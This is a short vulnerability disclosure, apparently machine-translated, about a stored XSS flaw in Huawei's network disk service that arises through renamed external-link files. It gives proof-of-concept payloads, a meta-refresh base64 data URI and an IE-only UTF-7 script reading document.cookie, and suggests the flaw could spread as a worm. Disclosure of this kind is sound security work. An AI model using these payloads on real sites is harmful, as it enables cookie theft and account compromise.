Huawei network disk storage type xss
RT. Thk @/fd.
Detailed description:
Buy glory 6. Test it ..
Upload a file. Release External links. Modify external link name
The entity encoding can generate an output point.
Code Region
<Meta name = "keywords" content = "", output point, network disk, Huawei network disk, DBank network disk, free network disk, network hard disk, Network Disk download, network storage space, cloud storage "/>
Two exploitation methods,
First, http-equiv = "Refresh"
Insert Code
Code Region0,url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"http-equiv="Refresh".txt
Because it is data. The cookie cannot be passed. However, we found that most of Huawei's operations do not have token, so we can use Cross-Origin Resource Sharing (cors) post data to cause worms and other impacts.
Second. Ie only
Use Code
Code Region"charset=utf-7 +AD4APA-script+AD4-alert(document.cookie)+ADw-/script+AD4-
Ie or qq browser (ie kernel browser)
Http://dl.vmall.com/c0iem6xdrx? V= 149900454 & % 3 Cmeta % 20http-equiv % 3D
In this way, data such as cookies can be transmitted. The disadvantage is browser restrictions and similar reflective xss.
The principle is that the get data includes <meta http-equiv> and the original charset is called using xss filter.
Proof of vulnerability:As mentioned above
Solution:Filter more ~~